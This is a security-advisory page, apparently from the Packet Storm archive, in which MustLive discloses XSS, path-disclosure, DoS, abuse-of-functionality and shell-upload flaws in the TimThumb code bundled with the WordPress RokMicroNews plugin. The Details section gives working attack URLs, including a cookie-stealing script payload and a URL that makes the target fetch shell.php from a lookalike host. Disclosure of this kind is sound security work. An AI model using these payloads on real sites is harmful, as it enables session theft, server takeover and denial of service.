what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress RokMicroNews 1.5 XSS / DoS / Shell Upload

WordPress RokMicroNews 1.5 XSS / DoS / Shell Upload
Posted Sep 19, 2013
Authored by MustLive

WordPress RokMicroNews plugin versions 1.5 and below suffer from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities.

tags | exploit, remote, denial of service, shell, vulnerability, xss
SHA-256 | ea1a5a7a7041572f9f1666622d7a30d7aaf1299bc892596fc238dd0d0c44d675

WordPress RokMicroNews 1.5 XSS / DoS / Shell Upload

Change Mirror Download
Hello list!

I want to warn you about multiple vulnerabilities in plugin RokMicroNews for
WordPress. In August 2012 I wrote about multiple vulnerabilities in RokBox
for WordPress (http://securityvulns.ru/docs28871.html). These
vulnerabilities are similar, since the same developers put the same
vulnerable TimThumb into another their plugin (vulnerabilities in which I
disclosed already in 2011).

These are Cross-Site Scripting, Full path disclosure, Abuse of
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In July 2013 developers released a patch for their plugins and themes with
TimThumb
(http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb),
which can be used to fix these vulnerabilities (except the last FPD).

-------------------------
Affected products:
-------------------------

Vulnerable are RokMicroNews 1.5 and previous versions (to attacks on
TimThumb and all versions are vulnerable to FPD).

Besides standalone WP plugin, this web application comes as part of the
themes. Many of 56 RocketTheme's WP themes
(http://www.rockettheme.com/wordpress-themes) use RokMicroNews and old
versions of these themes are vulnerable to attacks on TimThumb (and all
versions of them are vulnerable to FPD).

-------------------------
Affected vendors:
-------------------------

RocketTheme
http://www.rockettheme.com

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you
can read in my article Using of the sites for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be
used.

Arbitrary File Upload (WASC-31):

http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

This Arbitrary File Upload vulnerability in TimThumb was disclosed after 3,5
months after my disclosure of previous holes.

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close